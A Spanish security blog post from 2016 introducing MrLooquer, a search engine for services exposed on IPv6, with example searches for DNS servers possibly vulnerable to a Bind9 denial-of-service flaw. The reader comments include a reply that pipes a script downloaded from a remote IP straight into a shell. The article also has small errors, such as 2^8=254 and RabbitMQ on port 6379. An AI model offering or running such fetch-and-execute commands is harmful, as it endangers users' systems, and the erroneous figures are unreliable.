miércoles, marzo 23, 2016

MrLooquer #IPv6: Un buscador de servicios sobre IPv6 en Internet para pentesters, hackers y analistas de seguridad

Una de las cosas que cualquier aficionado a las redes de computadores conoce es el amplio espacio de direccionamiento disponible en IPv6, concretamente 128 bits. Puede que a alguien le parezca un número pequeño, pero esos bits dan para mucho, tanto, que el IETF, uno de los organismos reguladores de Internet, reconoce que los métodos basados en “fuerza bruta” utilizados en escaneos de reconocimiento en IPv4, no sirven en redes IPv6. Cuando un consultor de seguridad quiere saber qué equipos hay en una determinada subred con direccionamiento IPv4 suele hacer algo como: nmap 192.168.1.0/24

Figura 1: MrLooquer. Un buscador de servicios sobre IPv6 en Internet

El comando anterior lanzará diversas pruebas sobre cada una de las direcciones IP que existen dentro de esa subred. En este caso, al ser un /24 significa que hay 8 bits destinados a dar direcciones de host, es decir, 2^8=254 direcciones IP. En este tipo de escaneos se aplica el concepto de fuerza bruta, o lo que es lo mismo, probar todas las 254 opciones posibles. Una red IPv6, sin embargo, tiene habitualmente un /64 al final, y eso significa que hay 2^64 direcciones posibles dentro de esa subred, es decir 18.446.744.073.709.551.616, lo que resulta totalmente inviable de escanear. Y no olvidemos de que se trata de una sola red.

Figura 2: Documento de IETF con información sobre escaneos en IPv6

El resultado es que mucha gente piensa que usar una dirección IPv6 implica que ésta no podrá ser descubierta por un bot-escáner situado en Internet, lo cual nos lleva al peligroso concepto de seguridad por ocultación. Incluso hay gente que dice que esa supuesta oscuridad que ofrece IPv6 ofrece “a lot of security”.

Figura 3: Opinión sobre las defensas NO necesarias en IPv6

Pero esto no es del todo cierto. El pasado tres de marzo se presentó oficialmente en la séptima edición de la conferencia RootedCON el servicio online MrLooquer, que recopila y procesa millones y millones de servicios abiertos en máquinas conectadas a Internet en IPv6. El portal web que ofrece MrLooquer, que también es accesible por API, permite recorrer y visualizar millones de puertos y banners de servicios conectados a IPv6, permitiendo a un analista hacer cosas similares a las que está habituado al hacking con buscadores tipo Shodan, pero centrado en el protocolo IPv6.

Figura 4: Servicio online MrLooquer

También permite realizar búsquedas más específicas sobre la infraestructura Big Data que lo soporta para afinar los resultados. Algunos ejemplos de búsquedas::

Servidores de correo electrónico “Dovecot” escuchando en IPv6: Algunos piensan que todavía no hay muchos servidores de correo conectados a redes IPv6, y esto puede llegar a ser un problema para los mecanismos antispam existentes basados en listas negras. Un usuario con IPv6 podría enviar correos electrónicos utilizando como origen cada una de las 2^64 direcciones IPv6 disponibles. No olvidemos que un usuario residencial con salida a Internet por IPv6 suele tener asignado un /64 como el que hemos visto anteriormente, es decir, tiene 18.446.744.073.709.551.616 direcciones IPv6 públicas para a utilizar a su voluntad. Por tanto, los mecanismos actuales de control basados en listas negras IP no pueden funcionar de la misma forma con IPv6, y necesitan ser revisados para, por ejemplo, filtrar por rangos /64, con las implicaciones que esto conlleva.

Figura 5: Lista de servidores Dovecot escuchando sobre IPv6

Busqueda de servidores DNS: Podemos encontrar fácilmente servidores DNS escuchando en IPv6 con el filtro “port:53” (para usar este tipo de filtros es necesario registro, también gratuito). Observando los resultados de la búsqueda podemos preguntarnos si estos servidores podrían ser utilizados para lanzar ataques de denegación de servicio amplificados, y si los mecanismos de protección actuales contra este tipo de ataques están preparados para manejar ataques lanzados desde redes IPv6.

Figura 6: Servidores DNS sobre IPv6

● Busqueda de servidores DNS vulnerables: MrLooquer también permite conocer el grado de exposición de servicios afectados por una determinada vulnerabilidad escuchando en IPv6. Por ejemplo, en el caso de servidores DNS, podríamos realizar una búsqueda más dirigida para obtener equipos potencialmente afectados por la vulnerabilidad publicada recientemente relativa al servidor de nombres DNS Bind9 (CVE-2016-2088). Se trata de una vulnerabilidad que permite causar una denegación de servicio (DoS) mediante el envío remoto de un paquete malformado usando DNS Cookies.

Figura 7: Bug de DoS en servidores DNS

Mediante un sencilla búsqueda en MrLooquer podemos obtener un listado de servicios potencialmente afectados por esta vulnerabilidad escuchando en IPv6. De nuevo, nos surge la pregunta de si las políticas de seguridad usadas actualmente para proteger los sistemas de este tipo de ataques en IPv4 se están actualizando para redes IPv6:


Figura 8: Servidores DNS potencialmente vulnerables

Búsqueda de servicios: También podemos encontrar servicios tecnológicamente más actuales tales como gestores de colas RabbitMQ buscando el puerto 6379. Precisamente Daniel García presentó también en la última edición de RootedCon un ataque de inyección de comandos sobre este tipo de servicios cuando están mal configurados.


Figura 9: Servidores RabbitMQ sobre IPv6

Relación de direcciones IPv4&IPv6: MrLooquer también ofrece una característica muy interesante para cualquier analista de seguridad, que es la capacidad de relacionar entidades IPv6 con direcciones IPv4 y dominios. Esto hace posible descubrir cómo las organizaciones están adoptando IPv6 y cómo en algunos casos las políticas de seguridad no están siendo aplicadas de igual forma para servicios escuchando en cada uno de los protocolos. Esto puede suponer un riesgo elevado y debe ser considerado muy cuidadosamente, ya que como podemos ver, IPv6 no ofrece oscuridad y puede acabar siendo un punto de exposición a ataques.

Figura 10: Relación de servicios y direcciones IPv4 & IPv6
IPv6 Hoy en día

Por otro lado, respecto la pregunta de cuándo llegará IPv6 a nuestro país, ¿alguien tiene la sensación de que IPv6 no termina de llegar nunca? No sois los únicos, mucha gente lo piensa, pero eso tampoco es del todo cierto. Tenemos direcciones IPv6 mucho más cerca de lo que nos pensamos y ya hay que prepararse para ello. En esta charla de nuestro compañero Rafael Sánchez puedes ver cómo montarte tu propia infraestructura para comenzar en el mundo de la seguridad IPv6.


Figura 10: Montarse un escenario de hacking IPv6 por 2 €

Muchas empresas que quieren tener presencia en Internet se apoyan en infraestructuras provisionadas por proveedores de servidores virtuales o VPS. Muchos de estos proveedores, entre ellos los más importantes (Amazon, Digital Ocean o Google Cloud), ofrecen a sus clientes conectividad IPv6 por defecto. Si además tenemos en cuenta que muchos servicios en sistemas Linux se levantan por defecto tanto en IPv4 como en IPv6 (SSH, por ejemplo), obtenemos que cualquier empresa que contrate estos servicios levantará puertos y servicios en redes IPv6, incluso sin ser consciente de ello. De esta forma, podemos ver que efectivamente muchas empresas españolas ya cuentan con servicios escuchando en IPv6.

Figura 11: Empresas españolas con IPv6

MrLooquer surge con la finalidad de ser una herramienta útil para los expertos en seguridad en redes enfocada a IPv6, pero no solo eso, también tiene el objetivo de ayudar a entender las relaciones existentes entre entidades tales como: Dominio-IPv4-IPv6-Puerto. Si quieres más información sobre seguridad y hacking IPv6, tienes los siguientes artículos:
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (1)
- Hacking en redes de datos IPv6: Conceptos básicos IPv6 (2)
- Hacking en redes de datos IPv6: Hackeado en IPv6 por creer que no lo usas
- Hacking en redes de datos IPv6: Ataque de Neighbor Spoofing
- Hacking en redes de datos IPv6: Captura de SMB con Neighbor Spoofing
- Hacking en redes de datos IPv6: FC00::1 (Algunos) Ataques en redes IPv6
- Hacking en redes de datos IPv6: Man in the middle en redes IPv4 usando IPv6
- Hacking en redes de datos IPv6: Desactivar IPv6 para evitar D.O.S. SLAAC
- Hacking en redes de datos IPv6: Predecir direcciones IPv6 Local-Link de OS X
- Hacking en redes de datos IPv6: Ataques en redes de datos IPv4 e IPv6
- Hacking en redes de datos IPv6: Evil FOCA: Ataque SLAAC
- Hacking en redes de datos IPv6: Evil FOCA: Bridging HTTP(IPv6)-HTTPs(IPv4)
- Hacking en redes de datos IPv6: Pasar de IPv4 a IPv6 con una respuesta DNS
- Hacking en redes de datos IPv6: Cómo activar IPv6 en Google Chrome
- Hacking en redes de datos IPv4: Ataque DHCP ACK Injector

- Evil FOCA liberada bajo licencia Open Source
- Hacking en redes de datos IPv6: Topera - Scanner de puertos sobre IPv6
- Implementación de Iddle Port Scanning con IPv6
- Detección de IPv6 en Internet: Cada vez hay más sitios
- Detección de Happy Eyeballs en la red
- Ataque ICMPv6 Redirect: man in the middle a Android, OS X & iPhone
- Implementación de ataques "Delorean" a HSTS
En el futuro, MrLooquer evolucionará en este sentido utilizando tecnologías de visualización de relaciones mediante grafos y métodos de análisis avanzados para ofrecer a los usuarios la posibilidad de descubrir el grado de exposición de las organizaciones en el complejo panorama de Internet.

Autores: Fran & Rafa, equipo de https://mrlooquer.com (@mrlooquer)

5 comentarios:

  1. Hola maligno, tengo un problema con unos virus en mi celular, tengo una tablet hp stile 7 plus, he intentado quitarlo, pero no deja de salirme spam y se me descargan apps maliciosas solas, como elimino el virus? Ayudame porfavor

    ResponderEliminar
  2. @anonimo http://support.hp.com/us-en/document/c03936077

    ResponderEliminar
  3. COMO HAKEO FACEBOOK CHEMA SOS EL HACKER MAS GROSO DEL GLOBO

    ResponderEliminar
  4. @anonimo - 3 # wget http://10.10.235.100/script.sh O | sh

    ResponderEliminar
  5. Hola maligno

    Entendiendo que lo que hay detrás de una red /64 por defecto se asignan ips en base a la mac, y sabiendo que los direccionamientos mac se definen en base a los fabricantes de interfaces de red, o, incluso, sabiendo los rangos que estos fabricantes han asignado y o existen, o incluso, son compatibles con ipv6, podemos seguro reducir considerablemente el espacio a analizar.

    Por otra parte, sabiendo los rangos de ips que los isps tienen asignados, o, incluso, están asignando, también puede reducirse enormemente el espacio a analizar por fuerza bruta.

    Logicamente, seguro que hay quien se esconde de esto haciendo cambios en los direccionamientos, a la par que los que os dedicáis a esto seguro que podéis aplicar técnicas mucho más elaboradas y creativas que pueden reducir a algo que pueda convertirse en lo que siempre hemos llamado fuerza bruta


    ResponderEliminar